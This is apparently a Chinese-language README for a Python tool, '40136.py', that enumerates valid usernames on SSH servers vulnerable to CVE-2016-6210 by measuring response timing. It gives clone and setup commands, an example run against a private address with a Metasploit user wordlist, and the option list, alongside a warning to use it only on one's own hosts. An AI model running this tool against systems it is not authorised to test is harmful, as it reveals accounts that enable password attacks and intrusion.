针对受 CVE-2016-6210 影响的 SSH 服务进行用户名枚举。
仅限对您自己的主机使用!攻击您未获授权的主机可能会给您带来大麻烦!
git clone https://github.com/coolbabayaga/CVE-2016-6210.git
cd ssh-enum-cve-2016-6210
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
40136.py -h
示例:40136.py -U /usr/share/wordlists/metasploit/unix_users.txt -e -s 192.168.44.63:22
位置参数: host 指定 SSH 服务器地址,格式为 ip:port 或仅使用 ip
选项: -h, --help 显示此帮助信息并退出 -u, --user USER 指定单个用户名 -U, --userlist USERLIST 指定包含用户列表的文件 -e, --enumerated 仅显示枚举出的用户 -s, --silent 静默模式 --bytes BYTES 作为密码发送的字节数 --samples SAMPLES 基线计时所用的样本数 --factor FACTOR 计时边界所用的因子 --trials TRIALS 每个用户的尝试次数